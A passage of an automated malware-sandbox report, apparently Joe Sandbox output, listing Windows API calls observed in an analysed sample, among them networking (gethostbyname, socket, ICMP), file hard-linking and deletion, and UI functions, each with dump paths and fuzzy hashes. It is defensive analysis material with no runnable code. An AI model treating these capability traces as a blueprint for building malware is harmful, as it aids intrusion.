                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                        • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                        • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                        • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                        APIs
                          • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                        • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                        • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                        • String ID: HH
                        • API String ID: 1515696956-2761332787
                        • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                        • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                        • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                        • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                        APIs
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                        • GetMenuItemInfoW.USER32 ref: 004497EA
                        • SetMenuItemInfoW.USER32 ref: 00449817
                        • DrawMenuBar.USER32(?,?,00000000,?), ref: 00449828
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Menu$InfoItem$Draw_malloc
                        • String ID: 0
                        • API String ID: 772068139-4108050209
                        • Opcode ID: 439164982678a5d0467fbce16ff0cc1f8e36b96a2f6c52659de0cfd2e0748682
                        • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                        • Opcode Fuzzy Hash: 439164982678a5d0467fbce16ff0cc1f8e36b96a2f6c52659de0cfd2e0748682
                        • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AllocTask_wcslen
                        • String ID: hkG
                        • API String ID: 2651040394-3610518997
                        • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                        • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                        • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                        • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                        • API String ID: 2574300362-1816364905
                        • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                        • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                        • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                        • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                        APIs
                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004343DE
                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: ICMP.DLL$IcmpSendEcho
                        • API String ID: 2574300362-58917771
                        • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                        • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                        • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                        • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                        APIs
                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0043440D
                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: ICMP.DLL$IcmpCloseHandle
                        • API String ID: 2574300362-3530519716
                        • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                        • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                        • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                        • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                        APIs
                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0043443C
                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: ICMP.DLL$IcmpCreateFile
                        • API String ID: 2574300362-275556492
                        • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                        • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                        • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                        • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040EE7B
                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: IsWow64Process$kernel32.dll
                        • API String ID: 2574300362-3024904723
                        • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                        • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                        • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                        • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040EEEB
                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EEFD
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetNativeSystemInfo$kernel32.dll
                        • API String ID: 2574300362-192647395
                        • Opcode ID: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                        • Instruction ID: 788ba9bdae5bc0ddad915f4d08bdcf590d5e3b2ea1e3da194f5c7121584c3133
                        • Opcode Fuzzy Hash: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                        • Instruction Fuzzy Hash: ABD0C9B0944703AAC7311F72C91C70A7AE4AB40341F204C3EB996E1691DBBCC0508B2C
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: d3741df770e9af0668e4dcb74c8b3e11110977250ee5b52dc3804489dfde1972
                        • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                        • Opcode Fuzzy Hash: d3741df770e9af0668e4dcb74c8b3e11110977250ee5b52dc3804489dfde1972
                        • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                        APIs
                        • __flush.LIBCMT ref: 00414630
                        • __fileno.LIBCMT ref: 00414650
                        • __locking.LIBCMT ref: 00414657
                        • __flsbuf.LIBCMT ref: 00414682
                          • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                          • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                        • String ID:
                        • API String ID: 3240763771-0
                        • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                        • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                        • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                        • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                        APIs
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                        • VariantCopy.OLEAUT32(?,?), ref: 00478259
                        • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                        • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CopyVariant$ErrorLast
                        • String ID:
                        • API String ID: 2286883814-0
                        • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                        • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                        • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                        • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                        APIs
                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                        • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                        • #21.WSOCK32 ref: 004740E0
                        • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ErrorLast$socket
                        • String ID:
                        • API String ID: 1881357543-0
                        • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                        • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                        • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                        • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                        APIs
                        • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                        • GetWindowRect.USER32(?,?), ref: 00441D5A
                        • PtInRect.USER32(?,?,?), ref: 00441D6F
                        • MessageBeep.USER32(00000000,?,?,?,?,?,?,?), ref: 00441DF2
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                        • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                        • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                        • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                        • __isleadbyte_l.LIBCMT ref: 004238B2
                        • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                        • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                        • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                        • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                        • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                        APIs
                        • CreateHardLinkW.KERNEL32(00000000,?,00000000), ref: 0045D10A
                        • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                        • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                        • CreateHardLinkW.KERNEL32(00000000,?,00000000), ref: 0045D16A
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                        • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                        • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                        • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                        APIs
                        • GetParent.USER32(?), ref: 004505BF
                        • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                        • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                        • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Proc$Parent
                        • String ID:
                        • API String ID: 2351499541-0
                        • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                        • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                        • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                        • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                        APIs
                          • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                        • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                        • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                        • __itow.LIBCMT ref: 00461461
                        • __itow.LIBCMT ref: 004614AB
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
